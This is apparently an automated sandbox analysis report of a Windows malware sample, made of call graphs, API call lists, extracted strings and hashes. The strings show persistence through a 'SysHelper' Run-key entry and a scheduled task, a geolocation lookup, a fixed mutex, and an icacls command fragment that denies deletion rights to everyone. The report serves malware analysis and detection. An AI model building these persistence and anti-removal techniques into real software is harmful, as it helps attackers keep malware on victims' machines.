44853->44894 44855 430363 44856 430369 44855->44856 44857 43038d 44855->44857 44896 428cde 58 API calls 2 library calls 44855->44896 44856->44857 44895 425208 58 API calls __getptd_noexit 44856->44895 44857->44842 44860 43036e 44860->44842 44862 423591 44861->44862 44863 4235a9 _memset 44861->44863 44905 425208 58 API calls __getptd_noexit 44862->44905 44863->44862 44870 4235c0 44863->44870 44865 423596 44906 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44865->44906 44867 4235cb 44907 425208 58 API calls __getptd_noexit 44867->44907 44868 4235e9 44897 42fb64 44868->44897 44870->44867 44870->44868 44872 4235ee 44908 42f803 58 API calls __wsopen_helper 44872->44908 44874 4235f7 44875 4237e5 44874->44875 44909 42f82d 58 API calls __wsopen_helper 44874->44909 44922 4242fd 8 API calls 2 library calls 44875->44922 44878 4237ef 44879 423609 44879->44875 44910 42f857 44879->44910 44881 42361b 44881->44875 44882 423624 44881->44882 44883 42369b 44882->44883 44885 423637 44882->44885 44920 42f939 58 API calls 4 library calls 44883->44920 44917 42f939 58 API calls 4 library calls 44885->44917 44886 4236a2 44893 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 44886->44893 44921 42fbb4 58 API calls 4 library calls 44886->44921 44888 42364f 44888->44893 44918 42fbb4 58 API calls 4 library calls 44888->44918 44891 423668 44891->44893 44919 42f939 58 API calls 4 library calls 44891->44919 44893->44844 44894->44855 44895->44860 44896->44856 44898 42fb70 __wsopen_helper 44897->44898 44899 42fba5 __wsopen_helper 44898->44899 44900 428af7 __lock 58 API calls 44898->44900 44899->44872 44901 42fb80 44900->44901 44904 42fb93 44901->44904 44923 42fe47 44901->44923 44952 42fbab LeaveCriticalSection _doexit 44904->44952 44905->44865 44906->44893 44907->44893 44908->44874 44909->44879 44911 42f861 44910->44911 44912 42f876 44910->44912 44963 425208 58 API calls __getptd_noexit 44911->44963 44912->44881 44914 42f866 44964 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44914->44964 44916 42f871 44916->44881 44917->44888 44918->44891 44919->44893 44920->44886 44921->44893 44922->44878 44924 42fe53 __wsopen_helper 44923->44924 44925 428af7 __lock 58 API calls 44924->44925 44926 42fe71 _W_expandtime 44925->44926 44927 42f857 __tzset_nolock 58 API calls 44926->44927 44928 42fe86 44927->44928 44943 42ff25 __tzset_nolock __isindst_nolock 44928->44943 44953 42f803 58 API calls __wsopen_helper 44928->44953 44931 42fe98 44931->44943 44954 42f82d 58 API calls __wsopen_helper 44931->44954 44932 42ff71 GetTimeZoneInformation 44932->44943 44935 42feaa 44935->44943 44955 433f99 58 API calls 2 library calls 44935->44955 44937 42ffd8 WideCharToMultiByte 44937->44943 44938 42feb8 44956 441667 78 API calls 3 library calls 44938->44956 44939 430010 WideCharToMultiByte 44939->44943 44942 42ff0c _strlen 44958 428cde 58 API calls 2 library calls 44942->44958 44943->44932 44943->44937 44943->44939 44944 430157 __tzset_nolock __wsopen_helper __isindst_nolock 44943->44944 44950 43ff8e 58 API calls ___getlocaleinfo 44943->44950 44951 423c2d 61 API calls UnDecorator::getTemplateArgumentList 44943->44951 44960 4242fd 8 API calls 2 library calls 44943->44960 44961 420bed 58 API calls 2 library calls 44943->44961 44962 4300d7 LeaveCriticalSection _doexit 44943->44962 44944->44904 44946 42fed9 type_info::operator== 44946->44942 44946->44943 44957 420bed 58 API calls 2 library calls 44946->44957 44947 42ff1a _strlen 44947->44943 44959 42c0fd 58 API calls __wsopen_helper 44947->44959 44950->44943 44951->44943 44952->44899 44953->44931 44954->44935 44955->44938 44956->44946 44957->44942 44958->44947 44959->44943 44960->44943 44961->44943 44962->44943 44963->44914 44964->44916 44992 42019c 44965->44992 44967 4227d4 45000 425208 58 API calls __getptd_noexit 44967->45000 44970 4227d9 45001 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44970->45001 44971 4227e9 MultiByteToWideChar 44974 422804 GetLastError 44971->44974 44975 422815 44971->44975 44973 40d7a3 44973->44600 45002 4251e7 58 API calls 3 library calls 44974->45002 45003 428cde 58 API calls 2 library calls 44975->45003 44978 42281d 44979 422810 44978->44979 44980 422825 MultiByteToWideChar 44978->44980 45007 420bed 58 API calls 2 library calls 44979->45007 44980->44974 44981 42283f 44980->44981 45004 428cde 58 API calls 2 library calls 44981->45004 44984 4228a0 45008 420bed 58 API calls 2 library calls 44984->45008 44986 42284a 44986->44979 45005 42d51e 88 API calls 3 library calls 44986->45005 44988 422866 44988->44979 44989 42286f WideCharToMultiByte 44988->44989 44989->44979 44990 42288b GetLastError 44989->44990 45006 4251e7 58 API calls 3 library calls 44990->45006 44993 4201ad 44992->44993 44997 4201fa 44992->44997 45009 425007 58 API calls 2 library calls 44993->45009 44995 4201b3 44996 4201da 44995->44996 45010 4245dc 58 API calls 6 library calls 44995->45010 44996->44997 45011 42495e 58 API calls 6 library calls 44996->45011 44997->44967 44997->44971 45000->44970 45001->44973 45002->44979 45003->44978 45004->44986 45005->44988 45006->44979 45007->44984 45008->44973 45009->44995 45010->44996 45011->44997 45012->44641 45013->44641 45022 427ad7 GetModuleHandleExW 45014->45022 45017->44641 45018->44646 45019->44640 45020->44634 45021->44638 45023 427af0 GetProcAddress 45022->45023 45024 427b07 ExitProcess 45022->45024 45023->45024 45025 427b02 45023->45025 45025->45024 45026->44659 45033 427e1a __wsopen_helper 45032->45033 45034 428af7 __lock 51 API calls 45033->45034 45035 427e21 45034->45035 45036 427eda _doexit 45035->45036 45037 427e4f DecodePointer 45035->45037 45052 427f28 45036->45052 45037->45036 45039 427e66 DecodePointer 45037->45039 45046 427e76 45039->45046 45041 427f37 __wsopen_helper 45041->44348 45043 427f1f 45045 427b0b __heap_alloc 3 API calls 45043->45045 45044 427e83 EncodePointer 45044->45046 45048 427f28 45045->45048 45046->45036 45046->45044 45047 427e93 DecodePointer EncodePointer 45046->45047 45050 427ea5 DecodePointer DecodePointer 45047->45050 45049 427f35 45048->45049 45057 428c81 LeaveCriticalSection 45048->45057 45049->44348 45050->45046 45053 427f08 45052->45053 45054 427f2e 45052->45054 45053->45041 45056 428c81 LeaveCriticalSection 45053->45056 45058 428c81 LeaveCriticalSection 45054->45058 45056->45043 45057->45049 45058->45053
                          APIs
                            • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                            • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                            • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                          • GetCurrentProcess.KERNEL32 ref: 00419FC4
                          • GetLastError.KERNEL32 ref: 00419FD2
                          • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                          • GetLastError.KERNEL32 ref: 00419FE4
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0067AD78,?), ref: 0041A0BB
                          • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                          • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                            • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                            • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                            • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                          • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                          • API String ID: 2957410896-3144399390
                          • Opcode ID: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                          • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                          • Opcode Fuzzy Hash: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
                          • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040D26C
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                          • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                          • VariantInit.OLEAUT32(?), ref: 0040D2F0
                          • VariantInit.OLEAUT32(?), ref: 0040D309
                          • VariantInit.OLEAUT32(?), ref: 0040D322
                          • VariantInit.OLEAUT32(?), ref: 0040D33B
                          • VariantClear.OLEAUT32(?), ref: 0040D397
                          • VariantClear.OLEAUT32(?), ref: 0040D3A4
                          • VariantClear.OLEAUT32(?), ref: 0040D3B1
                          • VariantClear.OLEAUT32(?), ref: 0040D3C2
                          • CoUninitialize.OLE32 ref: 0040D3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                          • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                          • API String ID: 2496729271-1738591096
                          • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                          • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                          • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                          • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 923 40d037 922->923 923->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 943 40d0cd-40d0e1 call 414300 935->943 944 40d0bf-40d0ca call 422587 935->944 940 40d093-40d09b call 422587 936->940 941 40d09e-40d0b4 call 413d40 936->941 938->912 939->938 940->941 941->935 943->928 954 40d0e7-40d149 call 413010 943->954 944->943 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 967 40d1a0 965->967 966->965 968 40d191-40d198 966->968 969 40d1a2-40d1a6 967->969 968->965 970 40d1c7-40d1c9 968->970 971 40d1b3-40d1c5 969->971 972 40d1a8-40d1b0 call 422587 969->972 970->969 971->931 972->971
                          APIs
                          • _memset.LIBCMT ref: 0040CF4A
                          • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                          • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                          • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                          • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                          Strings
                          • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                          • Microsoft Internet Explorer, xrefs: 0040CF5A
                          • "country_code":", xrefs: 0040CFE1
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen$FileRead_memset
                          • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                          • API String ID: 1485416377-2962370585
                          • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                          • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 623 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 411e89-411e91 call 422587 621->624 633 411f36-411f38 623->633 634 411f3a-411f3f 623->634 624->623 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 641 411e52-411e57 631->641 632->631 639 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->639 640 411f40-411f49 634->640 635->636 636->629 653 411f98-411fa0 639->653 654 411fce-411fe9 639->654 640->640 644 411f4b-411f4d 640->644 645 411e59-411e5e 641->645 646 411e6a-411e6e 641->646 644->639 645->646 649 411e60-411e65 call 414690 645->649 646->610 651 411e74-411e77 646->651 649->646 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 661 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->661 662 412000-412009 657->662 663 411fbf-411fc9 call 415c10 658->663 665 411fb0-411fb9 659->665 671 4121d1-4121d5 661->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 667 41200b-41200d 662->667 663->654 665->665 669 411fbb-411fbd 665->669 667->661 669->663 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                          • _memset.LIBCMT ref: 00411D3B
                          • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                          • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                          • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                          • GetCommandLineW.KERNEL32 ref: 00411EB4
                          • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                          • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                          • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                          • UuidCreate.RPCRT4(?), ref: 00411EFC
                          • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                          • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                          • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                          • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                          • DeleteFileW.KERNEL32(?), ref: 00412036
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                          • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                          • _memset.LIBCMT ref: 00412090
                          • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                          • lstrcatW.KERNEL32(?,?), ref: 004120C0
                          • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                          • lstrlenW.KERNEL32(?), ref: 004120D7
                          • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                          • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                          • _memset.LIBCMT ref: 00412120
                          • SetLastError.KERNEL32(00000000), ref: 00412146
                          • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                          • lstrcatW.KERNEL32(?,?), ref: 0041216D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                          • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                          • API String ID: 2589766509-1182136429
                          • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                          • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32 ref: 00412235
                          • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                          • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                          • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                          • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                          • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                          • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                          • CloseHandle.KERNEL32(00000000), ref: 00412347
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                          • API String ID: 3668891214-3807497772
                          • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                          • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                          • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                          • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 984 4235a0 976->984 977->976 983 4235c0-4235c3 977->983 985 4235d7-4235dd 983->985 986 4235c5 983->986 991 4235a2-4235a8 984->991 989 4235e9 call 42fb64 985->989 990 4235df 985->990 987 4235c7-4235c9 986->987 988 4235cb-4235d5 call 425208 986->988 987->985 987->988 988->984 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1039 42368f-423696 1033->1039 1039->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                          APIs
                          • _memset.LIBCMT ref: 004235B1
                            • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                          • __gmtime64_s.LIBCMT ref: 0042364A
                          • __gmtime64_s.LIBCMT ref: 00423680
                          • __gmtime64_s.LIBCMT ref: 0042369D
                          • __allrem.LIBCMT ref: 004236F3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                          • __allrem.LIBCMT ref: 00423726
